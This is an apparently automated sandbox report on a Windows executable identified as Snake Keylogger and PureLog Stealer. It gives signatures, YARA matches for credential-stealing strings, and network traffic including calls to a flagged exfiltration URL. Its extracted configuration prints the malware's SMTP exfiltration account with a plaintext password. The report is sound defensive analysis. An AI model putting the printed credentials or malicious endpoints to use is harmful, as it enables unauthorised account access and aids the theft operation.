Edit tour

Windows Analysis Report
FATURA VE BELGELER..exe

Overview

General Information

Sample name:	FATURA VE BELGELER..exe
Analysis ID:	1435996
MD5:	c62da7a3eac6bae78ea8a771faa65d17
SHA1:	302984629aa44746a3e8b832c4fcacabcc585aaa
SHA256:	0d5548b7d4696c67dba1d5bb827285ed2d3846fd0ad28140c198ad9c467f1bb0
Tags:	exeSnakeKeylogger
Infos:

Detection

PureLog Stealer, Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected PureLog Stealer

Yara detected Snake Keylogger

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Machine Learning detection for sample

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

FATURA VE BELGELER..exe (PID: 6464 cmdline: "C:\Users\user\Desktop\FATURA VE BELGELER..exe" MD5: C62DA7A3EAC6BAE78EA8A771FAA65D17)

FATURA VE BELGELER..exe (PID: 6368 cmdline: "C:\Users\user\Desktop\FATURA VE BELGELER..exe" MD5: C62DA7A3EAC6BAE78EA8A771FAA65D17)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "info@promaksmakine.com", "Password": "16Promaks12!", "Host": "mail.promaksmakine.com", "Port": "587"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1488b:$a1: get_encryptedPassword 0x14b81:$a2: get_encryptedUsername 0x14697:$a3: get_timePasswordChanged 0x14792:$a4: get_passwordField 0x148a1:$a5: set_encryptedPassword 0x15e90:$a7: get_logins 0x15df3:$a10: KeyLoggerEventArgs 0x15a8c:$a11: KeyLoggerEventArgsEventHandler
00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x18170:$x1: $%SMTPDV$ 0x181d4:$x2: $#TheHashHere%& 0x19831:$x3: %FTPDV$ 0x1991b:$x4: $%TelegramDv$ 0x15a8c:$x5: KeyLoggerEventArgs 0x15df3:$x5: KeyLoggerEventArgs 0x19855:$m2: Clipboard Logs ID 0x19a17:$m2: Screenshot Logs ID 0x19ae3:$m2: keystroke Logs ID 0x199ef:$m4: \SnakeKeylogger\
00000000.00000002.1990854679.0000000005400000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1988410714.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1988410714.0000000002D1F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000002.4444099763.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xe2a2b:$a1: get_encryptedPassword 0x10344b:$a1: get_encryptedPassword 0x123c6b:$a1: get_encryptedPassword 0xe2d21:$a2: get_encryptedUsername 0x103741:$a2: get_encryptedUsername 0x123f61:$a2: get_encryptedUsername 0xe2837:$a3: get_timePasswordChanged 0x103257:$a3: get_timePasswordChanged 0x123a77:$a3: get_timePasswordChanged 0xe2932:$a4: get_passwordField 0x103352:$a4: get_passwordField 0x123b72:$a4: get_passwordField 0xe2a41:$a5: set_encryptedPassword 0x103461:$a5: set_encryptedPassword 0x123c81:$a5: set_encryptedPassword 0xe4030:$a7: get_logins 0x104a50:$a7: get_logins 0x125270:$a7: get_logins 0xe3f93:$a10: KeyLoggerEventArgs 0x1049b3:$a10: KeyLoggerEventArgs 0x1251d3:$a10: KeyLoggerEventArgs
00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0xe6310:$x1: $%SMTPDV$ 0x106d30:$x1: $%SMTPDV$ 0x127550:$x1: $%SMTPDV$ 0xe6374:$x2: $#TheHashHere%& 0x106d94:$x2: $#TheHashHere%& 0x1275b4:$x2: $#TheHashHere%& 0xe79d1:$x3: %FTPDV$ 0x1083f1:$x3: %FTPDV$ 0x128c11:$x3: %FTPDV$ 0xe7abb:$x4: $%TelegramDv$ 0x1084db:$x4: $%TelegramDv$ 0x128cfb:$x4: $%TelegramDv$ 0xe3c2c:$x5: KeyLoggerEventArgs 0xe3f93:$x5: KeyLoggerEventArgs 0x10464c:$x5: KeyLoggerEventArgs 0x1049b3:$x5: KeyLoggerEventArgs 0x124e6c:$x5: KeyLoggerEventArgs 0x1251d3:$x5: KeyLoggerEventArgs 0xe79f5:$m2: Clipboard Logs ID 0xe7bb7:$m2: Screenshot Logs ID 0xe7c83:$m2: keystroke Logs ID
Process Memory Space: FATURA VE BELGELER..exe PID: 6464	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: FATURA VE BELGELER..exe PID: 6464	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: FATURA VE BELGELER..exe PID: 6464	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: FATURA VE BELGELER..exe PID: 6464	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x26b65:$a1: get_encryptedPassword 0x26e51:$a2: get_encryptedUsername 0x2697b:$a3: get_timePasswordChanged 0x26a76:$a4: get_passwordField 0x26b7b:$a5: set_encryptedPassword 0x28fb9:$a7: get_logins 0x28f1c:$a10: KeyLoggerEventArgs 0x28bb5:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: FATURA VE BELGELER..exe PID: 6464	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x28bb5:$x5: KeyLoggerEventArgs 0x28f1c:$x5: KeyLoggerEventArgs 0x2980a:$x5: KeyLoggerEventArgs 0x29b3e:$x5: KeyLoggerEventArgs 0x2b14f:$m2: Clipboard Logs ID 0x2b22a:$m2: Screenshot Logs ID 0x2b25e:$m2: keystroke Logs ID 0x2b216:$m4: \SnakeKeylogger\
Process Memory Space: FATURA VE BELGELER..exe PID: 6368	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: FATURA VE BELGELER..exe PID: 6368	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: FATURA VE BELGELER..exe PID: 6368	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xe51a:$a1: get_encryptedPassword 0xe806:$a2: get_encryptedUsername 0xe330:$a3: get_timePasswordChanged 0xe42b:$a4: get_passwordField 0xe530:$a5: set_encryptedPassword 0x1096e:$a7: get_logins 0x108d1:$a10: KeyLoggerEventArgs 0x1056a:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: FATURA VE BELGELER..exe PID: 6368	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1056a:$x5: KeyLoggerEventArgs 0x108d1:$x5: KeyLoggerEventArgs 0x111bf:$x5: KeyLoggerEventArgs 0x114f3:$x5: KeyLoggerEventArgs 0x12b04:$m2: Clipboard Logs ID 0x12bdf:$m2: Screenshot Logs ID 0x12c13:$m2: keystroke Logs ID 0x12bcb:$m4: \SnakeKeylogger\
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.FATURA VE BELGELER..exe.5400000.10.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.FATURA VE BELGELER..exe.2af6b84.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.FATURA VE BELGELER..exe.5400000.10.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.FATURA VE BELGELER..exe.2b077fc.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.FATURA VE BELGELER..exe.2ad4668.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.FATURA VE BELGELER..exe.2af6b84.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.FATURA VE BELGELER..exe.2b077fc.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.FATURA VE BELGELER..exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.FATURA VE BELGELER..exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.FATURA VE BELGELER..exe.400000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
3.2.FATURA VE BELGELER..exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a8b:$a1: get_encryptedPassword 0x14d81:$a2: get_encryptedUsername 0x14897:$a3: get_timePasswordChanged 0x14992:$a4: get_passwordField 0x14aa1:$a5: set_encryptedPassword 0x16090:$a7: get_logins 0x15ff3:$a10: KeyLoggerEventArgs 0x15c8c:$a11: KeyLoggerEventArgsEventHandler
3.2.FATURA VE BELGELER..exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c32b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b55d:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b990:$a4: \Orbitum\User Data\Default\Login Data 0x1c9cf:$a5: \Kometa\User Data\Default\Login Data
3.2.FATURA VE BELGELER..exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1563a:$s1: UnHook 0x15641:$s2: SetHook 0x15649:$s3: CallNextHook 0x15656:$s4: _hook
3.2.FATURA VE BELGELER..exe.400000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x18370:$x1: $%SMTPDV$ 0x183d4:$x2: $#TheHashHere%& 0x19a31:$x3: %FTPDV$ 0x19b1b:$x4: $%TelegramDv$ 0x15c8c:$x5: KeyLoggerEventArgs 0x15ff3:$x5: KeyLoggerEventArgs 0x19a55:$m2: Clipboard Logs ID 0x19c17:$m2: Screenshot Logs ID 0x19ce3:$m2: keystroke Logs ID 0x19bef:$m4: \SnakeKeylogger\
0.2.FATURA VE BELGELER..exe.3d7c9c0.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.FATURA VE BELGELER..exe.3d7c9c0.6.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.FATURA VE BELGELER..exe.3d7c9c0.6.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12c8b:$a1: get_encryptedPassword 0x12f81:$a2: get_encryptedUsername 0x12a97:$a3: get_timePasswordChanged 0x12b92:$a4: get_passwordField 0x12ca1:$a5: set_encryptedPassword 0x14290:$a7: get_logins 0x141f3:$a10: KeyLoggerEventArgs 0x13e8c:$a11: KeyLoggerEventArgsEventHandler
0.2.FATURA VE BELGELER..exe.3d7c9c0.6.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a52b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1975d:$a3: \Google\Chrome\User Data\Default\Login Data 0x19b90:$a4: \Orbitum\User Data\Default\Login Data 0x1abcf:$a5: \Kometa\User Data\Default\Login Data
0.2.FATURA VE BELGELER..exe.3d7c9c0.6.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1383a:$s1: UnHook 0x13841:$s2: SetHook 0x13849:$s3: CallNextHook 0x13856:$s4: _hook
0.2.FATURA VE BELGELER..exe.3d7c9c0.6.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x16570:$x1: $%SMTPDV$ 0x165d4:$x2: $#TheHashHere%& 0x17c31:$x3: %FTPDV$ 0x17d1b:$x4: $%TelegramDv$ 0x13e8c:$x5: KeyLoggerEventArgs 0x141f3:$x5: KeyLoggerEventArgs 0x17c55:$m2: Clipboard Logs ID 0x17e17:$m2: Screenshot Logs ID 0x17ee3:$m2: keystroke Logs ID 0x17def:$m4: \SnakeKeylogger\
0.2.FATURA VE BELGELER..exe.3d5bfa0.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.FATURA VE BELGELER..exe.3d5bfa0.7.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.FATURA VE BELGELER..exe.3d5bfa0.7.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12c8b:$a1: get_encryptedPassword 0x12f81:$a2: get_encryptedUsername 0x12a97:$a3: get_timePasswordChanged 0x12b92:$a4: get_passwordField 0x12ca1:$a5: set_encryptedPassword 0x14290:$a7: get_logins 0x141f3:$a10: KeyLoggerEventArgs 0x13e8c:$a11: KeyLoggerEventArgsEventHandler
0.2.FATURA VE BELGELER..exe.3d5bfa0.7.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a52b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1975d:$a3: \Google\Chrome\User Data\Default\Login Data 0x19b90:$a4: \Orbitum\User Data\Default\Login Data 0x1abcf:$a5: \Kometa\User Data\Default\Login Data
0.2.FATURA VE BELGELER..exe.3d5bfa0.7.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1383a:$s1: UnHook 0x13841:$s2: SetHook 0x13849:$s3: CallNextHook 0x13856:$s4: _hook
0.2.FATURA VE BELGELER..exe.3d5bfa0.7.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x16570:$x1: $%SMTPDV$ 0x165d4:$x2: $#TheHashHere%& 0x17c31:$x3: %FTPDV$ 0x17d1b:$x4: $%TelegramDv$ 0x13e8c:$x5: KeyLoggerEventArgs 0x141f3:$x5: KeyLoggerEventArgs 0x17c55:$m2: Clipboard Logs ID 0x17e17:$m2: Screenshot Logs ID 0x17ee3:$m2: keystroke Logs ID 0x17def:$m4: \SnakeKeylogger\
0.2.FATURA VE BELGELER..exe.2d49e0c.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.FATURA VE BELGELER..exe.2d47df4.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.FATURA VE BELGELER..exe.3d5bfa0.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.FATURA VE BELGELER..exe.3d5bfa0.7.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.FATURA VE BELGELER..exe.3d5bfa0.7.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.FATURA VE BELGELER..exe.3d5bfa0.7.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a8b:$a1: get_encryptedPassword 0x354ab:$a1: get_encryptedPassword 0x55ccb:$a1: get_encryptedPassword 0x14d81:$a2: get_encryptedUsername 0x357a1:$a2: get_encryptedUsername 0x55fc1:$a2: get_encryptedUsername 0x14897:$a3: get_timePasswordChanged 0x352b7:$a3: get_timePasswordChanged 0x55ad7:$a3: get_timePasswordChanged 0x14992:$a4: get_passwordField 0x353b2:$a4: get_passwordField 0x55bd2:$a4: get_passwordField 0x14aa1:$a5: set_encryptedPassword 0x354c1:$a5: set_encryptedPassword 0x55ce1:$a5: set_encryptedPassword 0x16090:$a7: get_logins 0x36ab0:$a7: get_logins 0x572d0:$a7: get_logins 0x15ff3:$a10: KeyLoggerEventArgs 0x36a13:$a10: KeyLoggerEventArgs 0x57233:$a10: KeyLoggerEventArgs
0.2.FATURA VE BELGELER..exe.3d5bfa0.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1563a:$s1: UnHook 0x3605a:$s1: UnHook 0x5687a:$s1: UnHook 0x15641:$s2: SetHook 0x36061:$s2: SetHook 0x56881:$s2: SetHook 0x15649:$s3: CallNextHook 0x36069:$s3: CallNextHook 0x56889:$s3: CallNextHook 0x15656:$s4: _hook 0x36076:$s4: _hook 0x56896:$s4: _hook
0.2.FATURA VE BELGELER..exe.3d5bfa0.7.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x18370:$x1: $%SMTPDV$ 0x38d90:$x1: $%SMTPDV$ 0x595b0:$x1: $%SMTPDV$ 0x183d4:$x2: $#TheHashHere%& 0x38df4:$x2: $#TheHashHere%& 0x59614:$x2: $#TheHashHere%& 0x19a31:$x3: %FTPDV$ 0x3a451:$x3: %FTPDV$ 0x5ac71:$x3: %FTPDV$ 0x19b1b:$x4: $%TelegramDv$ 0x3a53b:$x4: $%TelegramDv$ 0x5ad5b:$x4: $%TelegramDv$ 0x15c8c:$x5: KeyLoggerEventArgs 0x15ff3:$x5: KeyLoggerEventArgs 0x366ac:$x5: KeyLoggerEventArgs 0x36a13:$x5: KeyLoggerEventArgs 0x56ecc:$x5: KeyLoggerEventArgs 0x57233:$x5: KeyLoggerEventArgs 0x19a55:$m2: Clipboard Logs ID 0x19c17:$m2: Screenshot Logs ID 0x19ce3:$m2: keystroke Logs ID
0.2.FATURA VE BELGELER..exe.2d46ddc.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.FATURA VE BELGELER..exe.3d7c9c0.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.FATURA VE BELGELER..exe.3d7c9c0.6.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.FATURA VE BELGELER..exe.3d7c9c0.6.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.FATURA VE BELGELER..exe.3d7c9c0.6.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a8b:$a1: get_encryptedPassword 0x352ab:$a1: get_encryptedPassword 0x14d81:$a2: get_encryptedUsername 0x355a1:$a2: get_encryptedUsername 0x14897:$a3: get_timePasswordChanged 0x350b7:$a3: get_timePasswordChanged 0x14992:$a4: get_passwordField 0x351b2:$a4: get_passwordField 0x14aa1:$a5: set_encryptedPassword 0x352c1:$a5: set_encryptedPassword 0x16090:$a7: get_logins 0x368b0:$a7: get_logins 0x15ff3:$a10: KeyLoggerEventArgs 0x36813:$a10: KeyLoggerEventArgs 0x15c8c:$a11: KeyLoggerEventArgsEventHandler 0x364ac:$a11: KeyLoggerEventArgsEventHandler
0.2.FATURA VE BELGELER..exe.3d7c9c0.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1563a:$s1: UnHook 0x35e5a:$s1: UnHook 0x15641:$s2: SetHook 0x35e61:$s2: SetHook 0x15649:$s3: CallNextHook 0x35e69:$s3: CallNextHook 0x15656:$s4: _hook 0x35e76:$s4: _hook
0.2.FATURA VE BELGELER..exe.3d7c9c0.6.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x18370:$x1: $%SMTPDV$ 0x38b90:$x1: $%SMTPDV$ 0x183d4:$x2: $#TheHashHere%& 0x38bf4:$x2: $#TheHashHere%& 0x19a31:$x3: %FTPDV$ 0x3a251:$x3: %FTPDV$ 0x19b1b:$x4: $%TelegramDv$ 0x3a33b:$x4: $%TelegramDv$ 0x15c8c:$x5: KeyLoggerEventArgs 0x15ff3:$x5: KeyLoggerEventArgs 0x364ac:$x5: KeyLoggerEventArgs 0x36813:$x5: KeyLoggerEventArgs 0x19a55:$m2: Clipboard Logs ID 0x19c17:$m2: Screenshot Logs ID 0x19ce3:$m2: keystroke Logs ID 0x3a275:$m2: Clipboard Logs ID 0x3a437:$m2: Screenshot Logs ID 0x3a503:$m2: keystroke Logs ID 0x19bef:$m4: \SnakeKeylogger\ 0x3a40f:$m4: \SnakeKeylogger\
Click to see the 36 entries

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://scratchdreams.tk	Avira URL Cloud: Label: malware
Source: https://scratchdreams.tk/_send_.php?TS	Avira URL Cloud: Label: malware
Source: http://scratchdreams.tk	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@promaksmakine.com", "Password": "16Promaks12!", "Host": "mail.promaksmakine.com", "Port": "587"}

Multi AV Scanner detection for domain / URL

Source: scratchdreams.tk	Virustotal: Detection: 17%	Perma Link
Source: https://scratchdreams.tk/_send_.php?TS	Virustotal: Detection: 16%	Perma Link
Source: https://scratchdreams.tk	Virustotal: Detection: 18%	Perma Link
Source: http://scratchdreams.tk	Virustotal: Detection: 17%	Perma Link

Multi AV Scanner detection for submitted file

Source: FATURA VE BELGELER..exe	ReversingLabs: Detection: 42%
Source: FATURA VE BELGELER..exe	Virustotal: Detection: 56%			Perma Link

Machine Learning detection for sample

Source: FATURA VE BELGELER..exe

Joe Sandbox ML: detected

Source: FATURA VE BELGELER..exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49709 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.5:49725 version: TLS 1.2

Source: FATURA VE BELGELER..exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: HJbl.pdb source: FATURA VE BELGELER..exe
Source:	Binary string: HJbl.pdbSHA256 source: FATURA VE BELGELER..exe

Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 4x nop then jmp 06CCFD0Dh	0_2_06CCF53B
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 4x nop then jmp 0281F7A1h	3_2_0281F4E8
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_0281EA08
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 4x nop then jmp 0281FBF9h	3_2_0281F941
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 4x nop then jmp 06698D95h	3_2_06698A58
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 4x nop then jmp 06695D11h	3_2_06695A68
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 4x nop then jmp 066988A9h	3_2_06698600
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 4x nop then jmp 06696169h	3_2_06695EC0
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 4x nop then jmp 06696A19h	3_2_06696770
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 4x nop then jmp 066965C1h	3_2_06696318
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	3_2_066937FA
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 4x nop then jmp 06696E71h	3_2_06696BC8
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 4x nop then jmp 066902E9h	3_2_06690040
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 4x nop then jmp 066972C9h	3_2_06697020
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	3_2_06693808
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 4x nop then jmp 06697BA1h	3_2_066978F8
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 4x nop then jmp 06690B99h	3_2_066908F0
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 4x nop then jmp 0669774Ah	3_2_066974A0
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 4x nop then jmp 06690741h	3_2_06690498
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 4x nop then jmp 06690FF1h	3_2_06690D48
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 4x nop then jmp 06697FF9h	3_2_06697D50
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 4x nop then jmp 06695891h	3_2_066955E8
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 4x nop then jmp 06698451h	3_2_066981A8
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 4x nop then jmp 06691449h	3_2_066911A0

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 3.2.FATURA VE BELGELER..exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/191.96.227.219 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/191.96.227.219 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/191.96.227.219 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/191.96.227.219 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/191.96.227.219 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/191.96.227.219 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/191.96.227.219 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/191.96.227.219 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 172.67.177.134 172.67.177.134
Source: Joe Sandbox View	IP Address: 104.21.27.85 104.21.27.85
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
